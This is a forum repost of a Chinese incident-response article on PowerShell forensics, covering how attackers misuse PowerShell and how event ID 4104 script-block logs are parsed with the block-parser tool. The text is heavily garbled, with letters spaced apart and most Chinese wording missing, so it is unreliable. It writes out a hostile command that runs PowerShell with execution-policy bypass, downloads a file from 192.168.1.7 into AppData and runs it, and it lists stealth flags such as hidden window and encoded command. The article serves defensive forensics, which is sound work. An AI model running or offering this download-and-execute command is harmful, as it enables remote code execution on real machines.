搜索

[18914] 2021-07-27_应急响应之powershell取证

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2021-07-27_应急响应之powershell取证 p o w e r s h e l l     h u a s e c   2 0 2 1 - 0 7 - 2 7   #   , 2 6                                                                   0 1             P o w e r S h e l l W i n d o w s 广 便 P o w e r S h e l l   P o w e r S h e l l   广 使 使 p o w e r s h e l l p s 使 s t a r t -   p r o c e s s I n v o k e - I t e m f i l e 1 . t x t C : U s e r s < u s e r > A p p D a t a R o a m i n g D o w n l o a d S t r i n g ( ) 广 1 . t x t w h o a m i p o w e r s h e l l w h o a m i 使 P o w e r S h e l l 使 广 使 -   W i n d o w S t y l e   h i d d e n   /   - w   h i d d e n :   - E x e c   B y p a s s :   / R e s t r i c t e d P o w e r S h e l l - C o m m a n d   /   - c :   P o w e r S h e l l - E n c o d e d C o m m a n d /   - e /   - - e n c :   - N o p   /   - n o p r o f i l e :   P r o f i l e 0 2 P o w e r S h e l l 使 w i n d o w s p o w e r s h e l l P o w e r S h e l l E x p l o r e r   . e x e P o w e r S h e l l P o w e r S h e l l / P o w e r S h e l l c m d . e x e 使 c m d p o w e r s h e l l c m d ( N e w - O b j e c t   N e t . W e b C l i e n t ) . d o w n l o a d f i l e ( ' h t t p : / / 1 9 2 . 1 6 8 . 1 . 7 / 1 . t x t ' , $ e n v : A p p d a t a + " w h o a m i . t x t " ) ; I n v o k e - I t e m $ e n v : A p p d a t a " w h o a m i . t x t " C : W i n d o w s S y s t e m 3 2 W i n d o w s P o w e r S h e l l v 1 . 0 p o w e r s h e l l . e x e - n o p   - E x e c   B y p a s s   - C o m m a n d   ( N e w - O b j e c t S y s t e m . N e t . W e b C l i e n t ) . D o w n l o a d F i l e ( ' h t t p : / / 1 9 2 . 1 6 8 . 1 . 7 / 1 . t x t ' , $ e n v : A p p d a t a +
M i c r o s o f t - W i n d o w s - P o w e r S h e l l   -   O p e r a t i o n a l . e v t x p o w e r s h e l l I D   4 1 0 4   S c r i p t b l o c k   使 b l o c k - p a r s e r : h t t p s : / / g i t h u b . c o m / m a t t h e w d u n w o o d y / b l o c k - p a r s e r l x m l p y t h o n - e v t x 使 p o w e r s h e l l > p y t h o n   b l o c k - p a r s e r . p y   - a   - f o u t p u t   " M i c r o s o f t - W i n d o w s - P o w e r S h e l l % 4 O p e r a t i o n a l . e v t x " p o w e r s h e l l > p y t h o n   b l o c k - p a r s e r . p y   - o     o u t p u t 2     " M i c r o s o f t - W i n d o w s - P o w e r S h e l l % 4 O p e r a t i o n a l . e v t x "
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理